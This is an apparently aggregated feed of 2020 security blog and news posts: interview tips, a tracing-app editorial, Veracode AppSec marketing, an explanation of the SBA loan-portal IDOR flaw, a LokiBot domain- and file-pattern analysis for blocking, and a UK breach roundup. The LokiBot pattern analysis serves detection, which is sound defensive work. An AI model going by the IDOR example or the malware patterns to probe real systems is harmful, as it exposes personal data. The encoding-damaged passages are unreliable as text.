Remember that note pad? Refer to your questions there and actively take notes as you go. This works in your favor a few ways. First off, it showcases your preparedness and that you’re fully engaged in the conversation. Also, it looks and feels natural—far more than sitting relatively idle in a chair for 30, 45, or even a full 60 minutes.

Control what you can.

There’s a fair chance something unexpected will come up. Your grade-schooler may let out a big shout after he drops a jar of peanut butter on his big toe. Your dog may strut in and let you know that it’s time for her walk. While you can’t control these things, you can control your reaction. That’s a strong indicator of how you handle little challenges. See such moments for what they are: a good opportunity. You can turn it into a positive by showing how adaptable and flexible you are.

Getting to know the person on the other end.

As you can see, the video interview shares a great deal with the interviews you’ve had before. Aside from the unique aspects of video job interviews we shared here, there’s something else to keep in mind right now: everyone’s situation is a little different today.

For example, the city you’re in may have rather relaxed rules around social distancing. However, the person you’re speaking with may be weeks into shelter in place restrictions. Before you hop onto that video interview, spend a few moments to empathize with what life may be like for that person right now and keep in mind how their life may be impacted. Also, see this conversation as an opportunity to improve your situation—just like nearly any interview is. Take it for that and focus on the positives.

Last up, a video interview has the similar rewards and challenges for the interviewer. Maybe their shih tzu will chime in during your chat. Or you may hear their kids break out into an impromptu soccer game with a ball of crumpled-up tinfoil. And that’s great! Just as interviewers are getting a glimpse into your world, you’re getting a glimpse into theirs as well. Like you, they’re grateful for the technology that allows us to work together in new ways, develop ourselves professionally, and simply get some face-to-face time with new people.

If you’re job hunting from home or know someone who is, I hope these insights have you feeling a little better about the prospect of a video interview—particularly if the whole thing is new to you. The changes we’re all facing right now are very much on my mind, as are the people and families who’ve had to add the pressure of a job search on top of it all. Once again, check out the Investopedia article on working and job searching from home that. I referenced it in my first job hunting article and a good portion of it presents an excellent overview of which roles and which firms are particularly WFH-friendly. My hope is that together these articles are of some help, whether for you or your friends and family who are on the hunt. And remember, we’re hiring too!

Stay Updated:

To stay updated on all things McAfee and for more resources on staying secure from home, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

 

 

 

The post How to Ace Your Video Interview: Job Hunting From Home appeared first on McAfee Blogs.

The Guardian view on an NHS coronavirus app: it must do no harm | Editorial

Smartphones can be used to digitally trace Covid-19. But not if the public don’t download an app over privacy fears – or find it won’t work on their device

The idea of the NHS tracing app is to enable smartphones to track users and tell them whether they interacted with someone who had Covid-19. Yet this will work only if large proportions of the population download the app. No matter how smart a solution may appear, mass consent is required. That will not be easy. Ministers and officials have failed to address the trade-offs between health and privacy by being ambiguous about the app’s safeguards.

Instead of offering cast-iron guarantees about the length of time for which data would be held; who can access it; and the level of anonymity afforded, we have had opacity and obfuscation. It is true that we are dealing with uncertainties. But without absolute clarity about privacy the public is unlikely to take up the app with the appropriate gusto.

Continue reading...

NICE Released the Spring 2020 eNewsletter

The Spring 2020 NICE eNewsletter has been published to provide subscribers information on academic, industry, and government developments related to the National Initiative for Cybersecurity Education (NICE), updates from key NICE programs, projects, the NICE Working Group, and other important news. To help increase the visibility of NICE, the NICE Program Office will issue regular eNewsletters that feature spotlight articles on academic, industry, and government developments related to NICE, updates from key NICE programs, projects, the NICE Working Group, and other important news. For

Security executives succeeding in the chaotic coronavirus world

I recently interviewed several CSOs and CISOs from the financial services, tech, healthcare, media and other industries to see how they were managing through these turbulent times. Below are the questions I asked them and a summary of their collective wisdom and best practices. While I would love to give these experts all the credit they deserve, all of them spoke on the condition that neither they nor their organizations be identified publicly.

What is your greatest security concern right now?

The collective response to this question is that security executives are most worried about the increase in phishing campaigns and fraud, especially with distracted employees who aren’t as diligent with security hygiene while working from home. As one executive stated, “My greatest concern right now is social engineering resulting from cyberattacks on people wherever they are. High stress means reduced cognitive functions, so attackers may find it easier to do social engineering, which opens the door to everything else.” 

To read this article in full, please click here

Now Is the Time for Government Agencies to up Their AppSec Game

When it comes to application security (AppSec), Forrester???s report, The State of Government Application Security, 2020, ツ?establishes that the government sector is falling behind other industries. And given the nature and quantity of consumer information housed by government agencies, government applications are a prime target for cyberattacks. It???s no wonder only 18 percent1 of consumers are confident that the federal government is able to secure the personal data of its citizens.

On top of existing concerns related to the government???s security measures, recent global events should also prompt government agencies to evaluate their AppSec solutions. In the past few months, state and federal agencies have been tasked with collecting patient data related to the COVID-19 pandemic and creating new applications for the stimulus relief package. This influx of data is coming at a very vulnerable time ??? cyber attackers are taking advantage of the fact that IT systems and processes are stretched thin. But it???s not too late for governments to make a change. There are several best practices that, if implemented properly, can help them stay secure. ツ?

Step one is implementing prerelease scans, like static analysis, to detect flaws earlier in the software development lifecycle and remediate faster. According to Veracode???s State of Software Security Industry Snapshot, most government agencies are only scanning their applications 12 times a year. As a result, government agencies have accumulated a significant amount of security debt. If they start scanning earlier, and more frequently, governments can find and remediate flaws faster and reduce their security debt.

Step two is embracing DevSecOps practices. With DevSecOps, security shifts to the beginning of the development process. This concept helps save time and money because security flaws and vulnerabilities are recognized and addressed prior to deployment. But embracing DevSecOps is not just about adding prerelease scans, it is about strategically implementing prerelease tools. For example, consider integrating the scans into the developers existing tools and processes and automating the scans. The easier it is for the developer to scan, the more applications will be scanned. And, given the current challenges our world is facing, having your scans automated ensures that your business won???t miss a beat.ツ?

To learn more ways that government entities can better secure their software, download our webinar, The State of Government Application Security. ツ?

ツ?

1 Consumer Technographicsツョ North American Healthcare Online Benchmark Recontact Survey 1, 2019 (US), Forrester Research, Inc.

What Caused the SBA Flaw that Exposed Business Owners’ Personal Info?

Current events are reshaping the way we live our everyday lives, and taking a heavy toll on the business world, with organizations of all sizes feeling financial disruption. Business continuity is more essential than ever during the pandemic; not just for customers who rely on products and services, but also for companies that need to keep funds flowing.

This has, foreseeably, led to thousands of loan applications for the Small Business Administration (SBA) in the United States, placing an overwhelming demand on the Economic Injury Disaster Loan Emergency (EIDL) program. The program currently provides up to $10,000 in financial assistance to small businesses suffering financial loss from the pandemic, but has unfortunately come with a security risk for some applicants seeking loans in order to maintain their business health.

During the recent influx of loan applications, the SBA acknowledged that the personal information of nearly 8,000 business owners might have been exposed to others accessing the program online. The flaw in the program simply required a user to hit the ???back??? button while in the loan application portal, which in some cases may have shown sensitive information belonging to another applicant.

Possible causes of the SBA flaw

While we can???t be certain which flaw is plaguing the SBA loan application system, we can make an educated guess based on similar behavior we???ve seen. Jamie Rougvie, a member of Veracode???s Manual Penetration Testing team, believes this flaw may be a combination of redirects and access control misconfigurations. Here is how this flaw may have impacted the SBA loan application process:

The Flaw

A company signs up to the loan portal and is given a unique Identity relating to that loan. Let???s say ???Company A??? signs up and gets a LoanID of 1. ???Company A??? then signs into the application and starts to fill in the application form. They then notice that they made a mistake on the previous page, so they click the back button within the application.

This back button then redirects them to the previous page. Now, let???s assume the code behind the button redirects them to the following URL:ツ? https://www.URL.com/application?LoanID=2 (it should be noted that on the Loan site this would be a more complex than a hard coded URL). We would assume that the value may be coming from a variable which is being dynamically changed based on a number of factors.

You can see here the LoanID has changed from 1 to 2. This means that instead of showing ???Company A??? data, it will attempt to show the data of LoanID 2 which is ???Company B.???

What should happen here is when ???Company A??? is redirected, a check should be done to make sure they have permission to access the page that they are being redirected to. If they have permissions to access the page, the redirect occurs. If they do not have permissions to access the page, either an error is displayed, or they are redirected elsewhere.

It seems like in this case no checks were performed on the request, and as such ???Company B???s??? data was displayed to ???Company A??? ??? meaning sensitive PII information was leaked on the webpage.

It???s not clear if ???Company A??? only had access to ???Company B???s??? data, or if this data changed each time a new request was made via the back button. This would mean that each time the back button was pressed, another company???s data would be leaked to a standard user. If an attacker found this type of flaw, they could within a small amount of time be able to obtain PII information of all companies in the loan application.ツ?ツ?ツ?ツ?ツ?

The seriousness of this issue depends on the type of application, and the information that is disclosed via the vulnerability. ???In an application like a loan website where the vast amount of information would be sensitive, this would be a critical severity issue and we would jump on call with the customer straight away to discuss the problem,??? Jamie further explains.

The SBA loan application issue potentially exposes sensitive information like an applicant???s name, Social Security Number, tax identification number, address, date of birth, financial insurance information, and more ??? which means a threat actor could then take that information and use it in any number of additional threats, like social engineering attacks or potential identity theft.

That???s why it???s important to stay one step ahead. Situations that entail building applications or websites quickly to amplify communication and provide services are not unique to current events; they should always involve security measures like regular scans and testing procedures. ???When you combine the power of Veracode automation tools and our MPT (Manual Penetration Testing) services, these types of issues can be identified early on and can be mitigated before pushing the application into production,??? Jamie explains.

Being proactive instead of reactive will set your organization up for preventative security measures so that you???re not faced with the cleanup that comes from worrisome vulnerabilities like IDOR and Session Management flaws.

Reducing risk with healthy AppSec

Cyberattacks and security threats are on the rise, which only amplifies vulnerabilities like the one we saw from the SBA in early April. Ultimately, this combination of rapid digital acceleration, and an uptick in cyberattacks, has left many organizations vulnerable. This situation stems in part from organizations adopting reactive, rather than preventative, security strategies.

What does preventative AppSec look like? Companies that are concerned about the health of their applications should scan early and scan often to identify problems before an issue arises. The mentality of shifting security left, bringing it into the development process sooner rather than later, can save money and time down the road. It helps eliminate security debt, too, which piles up over time and is carried as a constant risk from project to project. ツ?

Data from our 10th annual State of Software Security Report (SOSS) shows that when organizations scan their code frequently (more than 300 times a year), they carry five times lessツ?security debtツ?than those that scan the least.

Having a suite of SaaS solutions in the cloud to scan application code is essential for remote teams, but even more so today with entire companies going digital. Veracode???s application security solution combines five analysis types in one for a comprehensive look at your code as developers work. Every step of the way in the software development cycle (SDLC) ??? from the IDE to production ??? these scans ensure that your team is working smartly and efficiently to produce secure applications and stay ahead of potential issues.

And with hands-on training tools like Security Labs, developers are better equipped to write secure code, saving their organization from needing to remediate flaws down the road. Using Security Labs, software developers can exploit and fix an application in a contained environment with fast feedback, helping them learn in the languages that they need to know inside and out. Not only does it help developers satisfy compliance requirements, but also, they walk away with the training and skills needed to write more secure code and remediate flaws faster.

You don???t have to compromise between the race for swift deployment and the need for better application security. With the right tools and training, your organization and your team of developers will be well-equipped to handle what comes next as more of the world continues to take on a digital transformation and new security threats emerge.ツ?ツ?ツ?

Government investigates data breach revealing details of 774,000 migrants

Guardian Australia on Sunday revealed SkillSelect app allowed users to see partial names of applicants for skilled visas

The home affairs and employment departments are investigating a data breach revealing the personal details of 774,000 migrants and people aspiring to migrate to Australia, despite playing down the seriousness of the breach.

On Sunday, Guardian Australia revealed the government’s SkillSelect app allowed users to see unique identifiers of applicants for skilled visas, including partial names, which could then be used through searches with multiple filters to reveal other information about applicants.

Related: Immigrants don't take Australian jobs. They create jobs for others | Jock Collins

Continue reading...

New Book! The Best of TaoSecurity Blog, Volume 1



I'm very pleased to announce that I've published a new book!

It's The Best of TaoSecurity Blog, Volume 1: Milestones, Philosophy and Strategy, Risk, and Advice. It's available now in the Kindle Store, and if you're a member of Kindle Unlimited, it's currently free. I may also publish a print version. If you're interested, please tell me on Twitter.



The book lists at 332 pages and is over 83,000 words. I've been working on it since last year, but I've used the time in isolation to carry the first volume over the finish line.

The Amazon.com description says:

Since 2003, cybersecurity author Richard Bejtlich has been writing posts on TaoSecurity Blog, a site with 15 million views since 2011. Now, after re-reading over 3,000 posts and approximately one million words, he has selected and republished the very best entries from 17 years of writing.

In the first volume of the TaoSecurity Blog series, Bejtlich addresses milestones, philosophy and strategy, risk, and advice. Bejtlich shares his thoughts on leadership, the intruder's dilemma, managing burnout, controls versus assessments, insider versus outsider threats, security return on investment, threats versus vulnerabilities, controls and compliance, the post that got him hired at a Fortune 5 company as their first director of incident response, and much more.

He has written new commentaries to accompany each post, some of which would qualify as blog entries in their own right.  Read how the security industry, defensive methodologies, and strategies to improve career opportunities have evolved in this new book, written by one of the authors who has seen it all and survived to blog about it.

Finally, if you're interested in subsequent volumes, I have two planned.


I may also have a few other book projects in the pipeline. I'll have more to say on that in the coming weeks.

If you have any questions about the book, let me know. Currently you can see the table of contents via the "Look Inside" function, and there is a sample that lets you download and read some of the book. Enjoy!

Future-Proofing Your AppSec With Veracode SaaS Solutions

Global events that force the world to go digital can put business needs into perspective, and fast. We???ve been impressed by how our customers are hitting the work-from-home curveball; with a little ingenuity and some help from Veracode solutions, their businesses are carrying on. In fact, ourツ?Static Analysisツ?scan numbers reached an all-time high in March, and then again in April. That tells us our customers are buckling down, concentrating on software security, and making sure they are there for their customers, too.

Organizations around the globe are continuing to put customers first, even when unexpected and sudden shifts change the way the world works. We???re proud of that same business continuity at Veracode, helping our customers start, improve, or expand AppSec programs in order to thrive in a digitally transformed world. The best part? It doesn???t have to be a complicated process that disrupts everyday business needs.

Get started swiftly and securely

Now more than ever, it???s vital that installation processes are fast and seamless. If your organization can start scanning from day one without worrying about manual patching or updating down the road, that means you can hit the ground running with peace of mind for the future. It???s simple to get started with Veracode and provision access to begin using our SaaS solutions in the cloud. You can set off securing your applications right away without halting projects or missing tight deadlines. That???s the way AppSec should be.

Our comprehensive offering is built for scale so that you don???t have to miss the opportunity to deploy the secure software your customers rely on. And with a wide range of SaaS products ??? including Static Analysis, Dynamic Analysis, Software Composition Analysis, Security Labs, and IAST ??? there???s minimal to no installation needed across the board when you???re ready to ramp up production with Veracode.

Scale up, scale down, and save money

For businesses on top of their digital transformation, having aツ?healthy SaaS AppSec solutionツ?at their fingertips means staying innovative and shipping secure code on time. Our solutions integrate directly into your SDLC, with scalable offerings like automated testing that won???t get in the way of the work your developers are already doing.

In addition, accessing all application analysis types through one solution streamlines testing and reporting too, which means it???s easy to stay on top of goal setting and progress, while guiding development teams on which flaws to target first. Veracode conveniently combines all testing types???Static Analysis, Dynamic Analysis, Software Composition Analysis, and Pen Testing???in one place for easy access, covering web and mobile apps as well as microservices in most major programming languages.

Secure your applications anywhere, anytime

Since these powerful solutions are cloud-based, development and security teams collaborating around the world can keep pace with competitors in the digital go-to-market race. The ability to work from anywhere is essential for many businesses, especially today. You can access Veracode???s tools and solutions without bogging down your VPN???s server, reducing the risk that comes from potential breaches and cyberattacks no matter where you are in the world. If you???re working from home as a lot of us are right now, that???s a gamechanger for efficiency.

Whether you???re looking for ways to ramp up your security or you simply want to expand your existing solutions, no matter what???s happening out there in the world, Veracode is here to help. Tune in to our webinarツ?for a deep dive into maintaining business continuity and controlling AppSec costs during turbulent times.

Cyber Threats Observatory Gets Improvements

Today I am so happy to announce a big improvement in the threats observatory (available for here). The main improvement sees the introduction of clustering stereotypes for each tracked malware family in three different behaviors: Domains, Files and Processes.

Every malware does specific actions on domains, files and processes realms by meaning that every sample contacts several domain names, spawns specific processes and eventually saves file on HD (file-less malware are a separate topic here). Collecting everything coming from their execution and clustering on strings similitude would highlight several stereotypes that would be interesting for further studies or similitude blocking lists. The following image shows the current deployment state.

Screenshot Cyber Threats Observatory (HERE)

What you find

According to shared information, the Cyber Threats Observatory Dashboard is composed by the following sections:

  • Malware Families Trends. Detection distribution over time. In other words what are time-frames in where specific families are most active respect to others.
  • Malware Families. Automatic Yara rules classify samples into families. Many samples were not classified in terms of families, this happens when no signatures match the samples or if multiple family signatures match the same sample. In both ways I am not sure where the sample belong with, so it would be classified as “unknown” and not visualized on this graph. Missing slice of the cake is attributed to “unknown”.
  • Distribution Types. Based on the magic file bytes this graph would track the percentages of file types that Malware used as carrier.
  • Threat Level Distribution. From 0 to 3 is getting more and more dangerous. It would be interesting to understand the threat level of unknown families as well, in order to understand if hidden in unknown families Malware or false positives would hide. For such a reason a dedicated graph named Unknown Families Threat Level Distribution has created.
  • Stereotypes. Studying stereotypes would be useful to analyze similarities in clusters. In other words, it could be nice to see what are the patterns used by malware in both: domain names, file names and process names. It would be important for detection and even for preemptive blocking. Due to a vast amount of data, only the last (in term of recent) 10000 entries are included.
  • TOP domains, TOP processes and TOP File Names. With a sliding window of 300 last analyzed samples, the backend extracts the TOP (in terms of frequency) contacted domains, spawned processes and utilized file names. Again, there is no filter and no post-processing analysis in that fields, by meaning you could probably find as TOP domain “google.com” or “microsoft update”, which is fine, since if the sample queried them before performing its malicious intent, well, it is simply recorded and took to your attention. Same cup of tea with processes and file names.Indeed those fields are include the term “involved” into their title, if something is involved it does not mean that it is malicious , but that it is accounted to be in a malicious chain.

A simple example

Let’s assume we want to investigate LokiBot. According with any.run: Lokibot, also known as Loki-bot or Loki bot, is an information stealer malware that collects data from most widely used web browsers, FTP, email clients and over a hundred software tools installed on the infected machine.

But let’s start digging a little bit on the Cyber Threats Dashboard and see what we can find. First of all from the Malware Families section we see the overall detection rate. Today, we might easily say that LokiBit has low rate detection percentage 0.32388 if compared to different families such as GrandCrab, Emotet or TrickBot.

Malware Families

From the Family Distribution Over Time section (the following image) we might appreciate the detection distribution rate. By deselecting the unwanted malware families it is possible to track the distribution of the desire one (on our case LokiBot) over the time. In the following case all families but not LokiBot have been disable (by clicking on the Malware name directly from the graph legend). We might appreciate a compelling increment of LokiBot detection on 2020-04-28 and from 2020-04-30 to 2020-05-02. It looks like to be the most active observed period for this well documented family during the 2020. This observation perfectly fits the public mainstream information which sees many security magazines and many vendors observing such an increment as well. Mostly spread over COVID#19 malspam for example: SecurityAffairs, BankInfoSecurity, ThreatPOST, FortiNet.

Families Distribution Over Time

Digging a little bit into the specific case, we might observe the domain stereotypes. It’s nice to see that many domains stereotypes (in other words the representatives of a wide set of similar domains) have as the Top Level Domain .cf (Central Africa Republic) and some of them are quire similar: broken1.cf, broken2.cf, and so on and so forth. Something not very original to be blocked such as: broken<number>.cf

LokiBot Domain Stereotypes as 2020-05-02

Following on the diagram we might observe one more domain stereotype having as TLD .ICU, in the particular frenchman.icu (generic TLD targeting entrepreneurs and business owners) and following on this path one more domain stereotype having .co.ke (referring to Kenya). Now let’s try to focus a little bit on “Files” and check if there are some patterns in “File section”. So let’s check the following diagram.

LokiBot File Stereotypes as 2020-05-02

The linearity of the composition (every stereotype gets the same score, in that case 3) looks like the malware equally uses the different group of files, by meaning that if it starts on a victim machine it reads/creates/writes every single file at least one time per run. We might appreciate a nice pattern in the temporary file names, but it wont help us in detection since default windows temporary file pattern. However we might associate the presence of such a temporary files to the direct usage of spoolsv.exe, mrsys.exe and even explorer.exe. Even if many false positive could be triggered it would be nice to give it a try and see where it takes !

Most interested would be the presence of a specific file ([a..z][0.9]).lck that would be a nice keypoint to check its presence (by using files detection)

Conclusion

In this post I’ve introduced a big improvement of the Cyber Threat Observatory showing up a quick and dirty analysis on LokiBot through stereotypes. Aim of this project is not to give detailed analyses on Malware but rather focusing on general patterns and macro stereotypes in order to perform massive data analysis.

Hope you might find it useful, if so please share it with your fellows.

Cyber Security Roundup for May 2020

A roundup of UK focused Cyber and Information Security News, Blog Posts, Reports and general Threat Intelligence from the previous calendar month, April 2020.

As well reported, UK foreign exchange firm Travelex business operations were brought to a standstill after its IT systems were severely hit by the Sodinokibi ransomware at the start of the year. It was reported that
 REvil group were behind the attack and had stolen 5Gbs of customer personal data, and then demanded $6 million (£4.6m) in ransom. The Wall Street Journal reported in April 2020 that Travelex had reached a deal, paying $2.3 million (£1.84m) in Bitcoin to the cybercriminals. This sort of response incentivises future ransomware activity against all other businesses and could lead to an inflation of future cyber-extortion demands in my opinion.

Cognizant, a US large digital solutions provider and IT consultancy, was reportedly hit by the Maze ransomware.  Maze, previously known as the 'ChaCha' ransomware, like the Travelex attack, not only encrypts victim's files but steals sensitive data from the IT systems as well. Enabling the bad guys to threaten the publishing of the stolen data if the organisation cough up to their cyber-extortion demands, so the bad guys are very much rinsing and repeating lucrative attacks.

Microsoft wrote an excellent blog covering the 'motley crew' of ransomware payloads  The blog covers ransomware payloads said to be straining security operations especially in health care, Microsoft warned, urging security teams to look for signs of credential theft and lateral movement activities that herald attacks.

Researchers continue to be busy in exposing large sensitive datasets within misconfigured cloud services.  In April researchers reported 14 million Ring user details exposed in misconfigured AWS open database, fitness software Kinomap had 42 million user details exposed in another misconfigured database, and Maropost had 95 million users exposed, also in a misconfigured database.

Nintendo confirmed 160,000 of its users' accounts had been accessed, exposing PII and Nintendo store accounts. The gaming giant Nintendo said from April, its user's accounts were accessed through the Nintendo Network ID (NNID), which is primarily used for Switch gaming. The company is unaware exactly how the intrusion had occurred, saying it “seems to have been made by impersonating login to “Nintendo Network ID. “If you use the same password for your NNID and Nintendo account, your balance and registered credit card / PayPal may be illegally used at My Nintendo Store or Nintendo eShop. Please set different passwords for NNID and Nintendo account,” Nintendo said. In response to these issues the company has abolished user’s ability to log into their Nintendo account via NNID and passwords for both NNID and Nintendo accounts are being reset and the company is recommending multi-factor authentication be set up for each account.  The account breaches weren't the only cyber issue affecting Nintendo in April, it reported that a bot, dubbed 'Bird Bot' was used by a reseller to buy up Nintendo Switches before customers could make their Switch purchase from Nintendo. The bot using reseller benefits at the expense of consumers, in buying up all available Switches directly from Nintendo, they are able to sell them on for higher prices, so making a quick and easy tidy profit, due to the current high demand of Switches and lack of supply.

April was a busy month for security updates, Microsoft released security patches fixing 113 vulnerabilities on Patch Tuesday and an out-of-band patch for Teams found by researchers at CyberArk. Patch Tuesday for a quiet one for Adobe, though they released fixes for 21 critical vulnerabilities in illustrator and Bridge at the end of the month.  Oracle released a huge 397 fixes for 450 CVEs in over 100 products, which I think is a new record for a patch release!  

Sophos said it and its customers were attacked when a previously unknown SQL injection vulnerability in their physical and virtual XG Firewall units was exploited. “The attack affected systems configured with either the administration interface (HTTPS admin service) or the user portal exposed on the WAN zone. In addition, firewalls manually configured to expose a firewall service (e.g. SSL VPN) to the WAN zone that shares the same port as the admin or User Portal were also affected,Sophos said.

There were security critical patch releases for Mozilla Firefox, Chrome (twice), and for 8 Cisco products. A bunch of VMware patches for including a CVSS scored 10 (highest possible) in vCenter, a critical in vRealize Log Insight and a critical cross-site scripting vulnerability in ESXi 6.5 and 6.7. And finally, on the patch front, Intel decided to discontinue multiple products, as it was unable to keep ahead of patch their vulnerabilities.

Stay safe, safe home and watch for the scams.

BLOG
NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE